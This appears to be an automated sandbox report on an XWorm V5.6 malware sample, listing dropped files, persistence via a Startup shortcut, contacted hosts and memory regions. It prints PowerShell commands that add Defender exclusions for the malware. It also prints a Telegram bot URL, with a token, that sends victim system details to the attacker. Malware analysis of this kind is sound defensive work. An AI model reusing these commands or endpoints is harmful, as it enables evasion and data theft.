Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
VJV2AjJ7Na.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Roaming\XClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3215xsqh.mxa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kwlubfa.w5b.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ytiqaum.omr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aid3g2mq.pct.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d345c211.kro.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlgqxa3z.dyl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duyaet4y.crj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipue5a15.5xd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jg04wn2l.bb1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lwtwgnmw.dty.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxmi3xvi.024.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmp4obgy.ppb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phc1oh5n.rii.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmsodh11.axw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv1su0mt.5wj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbufjtze.jhr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Jul 26 18:22:53
2024, mtime=Fri Jul 26 18:22:53 2024, atime=Fri Jul 26 18:22:53 2024, length=71168, window=hide
|
modified
|
There are 10 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\VJV2AjJ7Na.exe
|
"C:\Users\user\Desktop\VJV2AjJ7Na.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://api.telegram.org/bot
|
unknown
|
||
main-although.gl.at.ply.gg
|
|||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://crl.m
|
unknown
|
||
http://crl.ml
|
unknown
|
||
https://ion=v4.5alC
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://www.microsoft.co
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://crl.mic
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://go.microsoft.c
|
unknown
|
||
http://go.microsoft.ctain
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
|
149.154.167.220
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 13 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
main-although.gl.at.ply.gg
|
147.185.221.21
|
||
ip-api.com
|
208.95.112.1
|
||
api.telegram.org
|
149.154.167.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
208.95.112.1
|
ip-api.com
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
147.185.221.21
|
main-although.gl.at.ply.gg
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7F2000
|
unkown
|
page readonly
|
||
29A1000
|
trusted library allocation
|
page read and write
|
||
2A00000
|
trusted library allocation
|
page read and write
|
||
25A481E0000
|
heap
|
page readonly
|
||
25A4A333000
|
trusted library allocation
|
page read and write
|
||
25A468AC000
|
heap
|
page read and write
|
||
D04000
|
heap
|
page read and write
|
||
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
25C12F80000
|
trusted library allocation
|
page read and write
|
||
7FFD34752000
|
trusted library allocation
|
page read and write
|
||
7FFD34721000
|
trusted library allocation
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34574000
|
trusted library allocation
|
page read and write
|
||
569F9CE000
|
stack
|
page read and write
|
||
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
1DBCFBDE000
|
trusted library allocation
|
page read and write
|
||
25C167E1000
|
trusted library allocation
|
page read and write
|
||
1DBDDE53000
|
trusted library allocation
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
1DBE6279000
|
heap
|
page read and write
|
||
7FFD34563000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
25C148C8000
|
heap
|
page read and write
|
||
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
7FFD34721000
|
trusted library allocation
|
page read and write
|
||
AF56D7E000
|
stack
|
page read and write
|
||
25C147D5000
|
heap
|
page read and write
|
||
BC04A0E000
|
stack
|
page read and write
|
||
1DBDDE01000
|
trusted library allocation
|
page read and write
|
||
AF56DFF000
|
stack
|
page read and write
|
||
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
1DBDE0EA000
|
trusted library allocation
|
page read and write
|
||
7DF46C330000
|
trusted library allocation
|
page execute and read and write
|
||
25A4910C000
|
trusted library allocation
|
page read and write
|
||
7FFD345BC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
EF5000
|
heap
|
page read and write
|
||
BC0498C000
|
stack
|
page read and write
|
||
25C2CDDA000
|
heap
|
page read and write
|
||
7FFD3462C000
|
trusted library allocation
|
page execute and read and write
|
||
1C02E000
|
stack
|
page read and write
|
||
7FFD348C4000
|
trusted library allocation
|
page read and write
|
||
1C19B000
|
stack
|
page read and write
|
||
24915B15000
|
trusted library allocation
|
page read and write
|
||
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
25A608B8000
|
heap
|
page read and write
|
||
249147CB000
|
trusted library allocation
|
page read and write
|
||
BC037F9000
|
stack
|
page read and write
|
||
1DBDDDE1000
|
trusted library allocation
|
page read and write
|
||
25C15959000
|
trusted library allocation
|
page read and write
|
||
7FFD3458D000
|
trusted library allocation
|
page execute and read and write
|
||
25A49E03000
|
trusted library allocation
|
page read and write
|
||
1BBEE000
|
stack
|
page read and write
|
||
249158F7000
|
trusted library allocation
|
page read and write
|
||
569FC72000
|
stack
|
page read and write
|
||
24915A8C000
|
trusted library allocation
|
page read and write
|
||
25C2D112000
|
heap
|
page read and write
|
||
BC0488A000
|
stack
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
25A48597000
|
trusted library allocation
|
page read and write
|
||
BC033E3000
|
stack
|
page read and write
|
||
1C09E000
|
stack
|
page read and write
|
||
2492CDDC000
|
heap
|
page read and write
|
||
24924994000
|
trusted library allocation
|
page read and write
|
||
56A0ECE000
|
stack
|
page read and write
|
||
7FFD3472A000
|
trusted library allocation
|
page read and write
|
||
AF57F0E000
|
stack
|
page read and write
|
||
2492CCE0000
|
heap
|
page read and write
|
||
1BCED000
|
stack
|
page read and write
|
||
2492CCE8000
|
heap
|
page read and write
|
||
25C157A0000
|
trusted library allocation
|
page read and write
|
||
7FFD345CC000
|
trusted library allocation
|
page execute and read and write
|
||
25A496B8000
|
trusted library allocation
|
page read and write
|
||
1B6AF000
|
stack
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
BC03DBE000
|
stack
|
page read and write
|
||
24912C1D000
|
heap
|
page read and write
|
||
AF56CFD000
|
stack
|
page read and write
|
||
7FFD345CC000
|
trusted library allocation
|
page execute and read and write
|
||
25C12DFB000
|
heap
|
page read and write
|
||
2492CE3C000
|
heap
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34742000
|
trusted library allocation
|
page read and write
|
||
56A017A000
|
stack
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
25C149E1000
|
trusted library allocation
|
page read and write
|
||
29F7000
|
trusted library allocation
|
page read and write
|
||
25A60850000
|
heap
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
1DBCED43000
|
trusted library allocation
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page execute and read and write
|
||
1DBDE0DA000
|
trusted library allocation
|
page read and write
|
||
2492CE8B000
|
heap
|
page read and write
|
||
25A48511000
|
trusted library allocation
|
page read and write
|
||
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
1DBCEE1A000
|
trusted library allocation
|
page read and write
|
||
1DBCEE18000
|
trusted library allocation
|
page read and write
|
||
25C147D0000
|
heap
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
56A01F9000
|
stack
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
11F0000
|
heap
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page execute and read and write
|
||
2491497A000
|
trusted library allocation
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
AF56EFE000
|
stack
|
page read and write
|
||
7FFD34873000
|
trusted library allocation
|
page read and write
|
||
24924BD7000
|
trusted library allocation
|
page read and write
|
||
1B36A000
|
stack
|
page read and write
|
||
2492CD31000
|
heap
|
page read and write
|
||
1BAEF000
|
stack
|
page read and write
|
||
1DBCEDA6000
|
trusted library allocation
|
page read and write
|
||
DA7000
|
heap
|
page read and write
|
||
1B7B0000
|
heap
|
page read and write
|
||
1DBCC311000
|
heap
|
page read and write
|
||
24912C03000
|
heap
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
1C2E0000
|
heap
|
page read and write
|
||
1DBCDC90000
|
trusted library allocation
|
page read and write
|
||
24912C49000
|
heap
|
page read and write
|
||
2492CBE0000
|
heap
|
page read and write
|
||
7F0000
|
unkown
|
page readonly
|
||
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
1DBCC290000
|
heap
|
page read and write
|
||
1B81C000
|
heap
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
29FC000
|
trusted library allocation
|
page read and write
|
||
1DBE65DB000
|
heap
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
25A58819000
|
trusted library allocation
|
page read and write
|
||
24912CF0000
|
trusted library allocation
|
page read and write
|
||
7FFD348DC000
|
trusted library allocation
|
page read and write
|
||
EF0A8CC000
|
stack
|
page read and write
|
||
1DBCC270000
|
heap
|
page read and write
|
||
25C2D0B7000
|
heap
|
page read and write
|
||
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
25A60B4D000
|
heap
|
page read and write
|
||
EF096F9000
|
stack
|
page read and write
|
||
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
25C12FA0000
|
heap
|
page read and write
|
||
AF57079000
|
stack
|
page read and write
|
||
7FFD34562000
|
trusted library allocation
|
page read and write
|
||
7FFD34690000
|
trusted library allocation
|
page execute and read and write
|
||
1DBCDCC0000
|
trusted library allocation
|
page read and write
|
||
1B5AE000
|
stack
|
page read and write
|
||
29EA000
|
trusted library allocation
|
page read and write
|
||
1DBCEE9D000
|
trusted library allocation
|
page read and write
|
||
7FFD3493A000
|
trusted library allocation
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
7FFD34752000
|
trusted library allocation
|
page read and write
|
||
BC0367E000
|
stack
|
page read and write
|
||
EF09C7B000
|
stack
|
page read and write
|
||
2492CE5B000
|
heap
|
page read and write
|
||
7FFD3499D000
|
trusted library allocation
|
page read and write
|
||
24924A41000
|
trusted library allocation
|
page read and write
|
||
24912D90000
|
heap
|
page read and write
|
||
24914C1D000
|
trusted library allocation
|
page read and write
|
||
25C2D027000
|
heap
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
1DBE6512000
|
heap
|
page read and write
|
||
1B7AD000
|
stack
|
page read and write
|
||
1C31E000
|
heap
|
page read and write
|
||
25C2CDF0000
|
heap
|
page read and write
|
||
569FD7E000
|
stack
|
page read and write
|
||
25A46860000
|
heap
|
page read and write
|
||
2492CCF0000
|
heap
|
page read and write
|
||
7FFD34626000
|
trusted library allocation
|
page execute and read and write
|
||
569FF77000
|
stack
|
page read and write
|
||
AF57239000
|
stack
|
page read and write
|
||
7FFD34754000
|
trusted library allocation
|
page read and write
|
||
1DBE6230000
|
heap
|
page read and write
|
||
DA0000
|
heap
|
page read and write
|
||
1C2DE000
|
stack
|
page read and write
|
||
25A482C5000
|
heap
|
page read and write
|
||
25C16806000
|
trusted library allocation
|
page read and write
|
||
1DBCF645000
|
trusted library allocation
|
page read and write
|
||
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
24915350000
|
trusted library allocation
|
page read and write
|
||
25C24CEA000
|
trusted library allocation
|
page read and write
|
||
1D0BC000
|
stack
|
page read and write
|
||
300A000
|
trusted library allocation
|
page read and write
|
||
1B7B2000
|
heap
|
page read and write
|
||
1DBCC2A2000
|
heap
|
page read and write
|
||
1DBCDD90000
|
heap
|
page execute and read and write
|
||
7FFD3471A000
|
trusted library allocation
|
page read and write
|
||
25A495CF000
|
trusted library allocation
|
page read and write
|
||
24912E05000
|
heap
|
page read and write
|
||
25C2D0D9000
|
heap
|
page read and write
|
||
1DBE65D9000
|
heap
|
page read and write
|
||
25A60B16000
|
heap
|
page read and write
|
||
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
AF56E79000
|
stack
|
page read and write
|
||
7FFD34680000
|
trusted library allocation
|
page execute and read and write
|
||
25A483C0000
|
heap
|
page read and write
|
||
D3D000
|
heap
|
page read and write
|
||
EF09A79000
|
stack
|
page read and write
|
||
7FFD34742000
|
trusted library allocation
|
page read and write
|
||
7FFD3457B000
|
trusted library allocation
|
page read and write
|
||
25C15BF8000
|
trusted library allocation
|
page read and write
|
||
1AF2C000
|
stack
|
page read and write
|
||
D11000
|
heap
|
page read and write
|
||
EF0A94C000
|
stack
|
page read and write
|
||
AF57138000
|
stack
|
page read and write
|
||
7FFD34656000
|
trusted library allocation
|
page execute and read and write
|
||
2492CADF000
|
heap
|
page read and write
|
||
25A49281000
|
trusted library allocation
|
page read and write
|
||
EF0A847000
|
stack
|
page read and write
|
||
24912E00000
|
heap
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
25C15948000
|
trusted library allocation
|
page read and write
|
||
1DBE6616000
|
heap
|
page read and write
|
||
25C2CD96000
|
heap
|
page read and write
|
||
2960000
|
heap
|
page read and write
|
||
1DBCC470000
|
trusted library section
|
page read and write
|
||
24924A43000
|
trusted library allocation
|
page read and write
|
||
25C12FA5000
|
heap
|
page read and write
|
||
25C162D1000
|
trusted library allocation
|
page read and write
|
||
7FFD34626000
|
trusted library allocation
|
page read and write
|
||
944000
|
stack
|
page read and write
|
||
7FFD3457D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
25C2CEFE000
|
heap
|
page read and write
|
||
24916573000
|
trusted library allocation
|
page read and write
|
||
25A58582000
|
trusted library allocation
|
page read and write
|
||
25C167BC000
|
trusted library allocation
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
25C2D016000
|
heap
|
page read and write
|
||
1DBCE9E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34590000
|
trusted library allocation
|
page read and write
|
||
AF57E0E000
|
stack
|
page read and write
|
||
7FFD348A3000
|
trusted library allocation
|
page read and write
|
||
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
2492CA9A000
|
heap
|
page read and write
|
||
25C2D12B000
|
heap
|
page read and write
|
||
25A4A313000
|
trusted library allocation
|
page read and write
|
||
25C2CF02000
|
heap
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
25A58541000
|
trusted library allocation
|
page read and write
|
||
25C15955000
|
trusted library allocation
|
page read and write
|
||
25C2CEC7000
|
heap
|
page execute and read and write
|
||
25C12D84000
|
heap
|
page read and write
|
||
7FFD349B6000
|
trusted library allocation
|
page read and write
|
||
1DBCDDD5000
|
heap
|
page read and write
|
||
2492CD4D000
|
heap
|
page read and write
|
||
25C14810000
|
trusted library allocation
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
1DBCED54000
|
trusted library allocation
|
page read and write
|
||
24915358000
|
trusted library allocation
|
page read and write
|
||
25C155E3000
|
trusted library allocation
|
page read and write
|
||
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
25C2CEC0000
|
heap
|
page execute and read and write
|
||
1DBCC4B0000
|
heap
|
page execute and read and write
|
||
25A468BE000
|
heap
|
page read and write
|
||
25C1575D000
|
trusted library allocation
|
page read and write
|
||
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
1DBCDDE1000
|
trusted library allocation
|
page read and write
|
||
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
24924A3C000
|
trusted library allocation
|
page read and write
|
||
7FFD34754000
|
trusted library allocation
|
page read and write
|
||
24924A49000
|
trusted library allocation
|
page read and write
|
||
25A4981A000
|
trusted library allocation
|
page read and write
|
||
EF0967E000
|
stack
|
page read and write
|
||
249156F5000
|
trusted library allocation
|
page read and write
|
||
25A49110000
|
trusted library allocation
|
page read and write
|
||
129A1000
|
trusted library allocation
|
page read and write
|
||
24912BB0000
|
heap
|
page readonly
|
||
24914751000
|
trusted library allocation
|
page read and write
|
||
AF5743B000
|
stack
|
page read and write
|
||
2492CEA4000
|
heap
|
page read and write
|
||
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
2492CD46000
|
heap
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
25C2D12E000
|
heap
|
page read and write
|
||
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
CDC000
|
heap
|
page read and write
|
||
1DBCF165000
|
trusted library allocation
|
page read and write
|
||
7FFD348A2000
|
trusted library allocation
|
page read and write
|
||
25C1596A000
|
trusted library allocation
|
page read and write
|
||
7FFD34550000
|
trusted library allocation
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
1DBE6529000
|
heap
|
page read and write
|
||
BC03D3C000
|
stack
|
page read and write
|
||
7FFD34656000
|
trusted library allocation
|
page execute and read and write
|
||
25C2CEF0000
|
heap
|
page read and write
|
||
1DBCFBFE000
|
trusted library allocation
|
page read and write
|
||
1CAB0000
|
heap
|
page read and write
|
||
129AF000
|
trusted library allocation
|
page read and write
|
||
D47000
|
heap
|
page read and write
|
||
25C2D121000
|
heap
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page execute and read and write
|
||
25A48180000
|
heap
|
page read and write
|
||
25A60899000
|
heap
|
page read and write
|
||
7FFD34744000
|
trusted library allocation
|
page read and write
|
||
7FFD3486D000
|
trusted library allocation
|
page read and write
|
||
D13000
|
heap
|
page read and write
|
||
CD6000
|
heap
|
page read and write
|
||
AF56FFD000
|
stack
|
page read and write
|
||
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
1DBCEE12000
|
trusted library allocation
|
page read and write
|
||
25A49515000
|
trusted library allocation
|
page read and write
|
||
25A496EB000
|
trusted library allocation
|
page read and write
|
||
1DBCC2CC000
|
heap
|
page read and write
|
||
7FFD348DC000
|
trusted library allocation
|
page read and write
|
||
BC03CBE000
|
stack
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page execute and read and write
|
||
25A4689D000
|
heap
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
25C15DA5000
|
trusted library allocation
|
page read and write
|
||
25C15AD9000
|
trusted library allocation
|
page read and write
|
||
24912C05000
|
heap
|
page read and write
|
||
24912BC8000
|
heap
|
page read and write
|
||
25C2D08A000
|
heap
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
25A49E62000
|
trusted library allocation
|
page read and write
|
||
EF093CF000
|
stack
|
page read and write
|
||
AF5808E000
|
stack
|
page read and write
|
||
7FFD348D8000
|
trusted library allocation
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
25C2D240000
|
heap
|
page read and write
|
||
25A49DA0000
|
trusted library allocation
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34574000
|
trusted library allocation
|
page read and write
|
||
1DBDE0D1000
|
trusted library allocation
|
page read and write
|
||
BC0480E000
|
stack
|
page read and write
|
||
804000
|
unkown
|
page readonly
|
||
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
7FFD3459B000
|
trusted library allocation
|
page execute and read and write
|
||
1C6E8000
|
stack
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
7FFD346F1000
|
trusted library allocation
|
page read and write
|
||
1C5EA000
|
stack
|
page read and write
|
||
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
AF5800D000
|
stack
|
page read and write
|
||
7FFD348B9000
|
trusted library allocation
|
page read and write
|
||
2492CB41000
|
heap
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
25C24A11000
|
trusted library allocation
|
page read and write
|
||
25C16248000
|
trusted library allocation
|
page read and write
|
||
24912BC0000
|
heap
|
page read and write
|
||
24912B70000
|
trusted library section
|
page read and write
|
||
25A60950000
|
heap
|
page execute and read and write
|
||
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
1DBCEA4F000
|
trusted library allocation
|
page read and write
|
||
2492CE87000
|
heap
|
page read and write
|
||
25C14C09000
|
trusted library allocation
|
page read and write
|
||
2492CCF4000
|
heap
|
page read and write
|
||
2492CAE6000
|
heap
|
page read and write
|
||
7FFD34646000
|
trusted library allocation
|
page execute and read and write
|
||
25C2D0EF000
|
heap
|
page read and write
|
||
7DF4B2FC0000
|
trusted library allocation
|
page execute and read and write
|
||
2491580E000
|
trusted library allocation
|
page read and write
|
||
1DBE6520000
|
heap
|
page read and write
|
||
EF0987E000
|
stack
|
page read and write
|
||
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
1DBCEF00000
|
trusted library allocation
|
page read and write
|
||
56A0DCE000
|
stack
|
page read and write
|
||
AF573BE000
|
stack
|
page read and write
|
||
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
24924A4B000
|
trusted library allocation
|
page read and write
|
||
1DBE6550000
|
heap
|
page read and write
|
||
7FFD345F0000
|
trusted library allocation
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
24912AE0000
|
heap
|
page read and write
|
||
1DBE64E0000
|
heap
|
page execute and read and write
|
||
25C2CD20000
|
heap
|
page read and write
|
||
2492CE7E000
|
heap
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page execute and read and write
|
||
24915388000
|
trusted library allocation
|
page read and write
|
||
1AD27000
|
heap
|
page read and write
|
||
25C14770000
|
trusted library allocation
|
page read and write
|
||
7FFD345FC000
|
trusted library allocation
|
page execute and read and write
|
||
25C24A01000
|
trusted library allocation
|
page read and write
|
||
25A481F0000
|
trusted library allocation
|
page read and write
|
||
1DBCEF3A000
|
trusted library allocation
|
page read and write
|
||
7FFD34712000
|
trusted library allocation
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
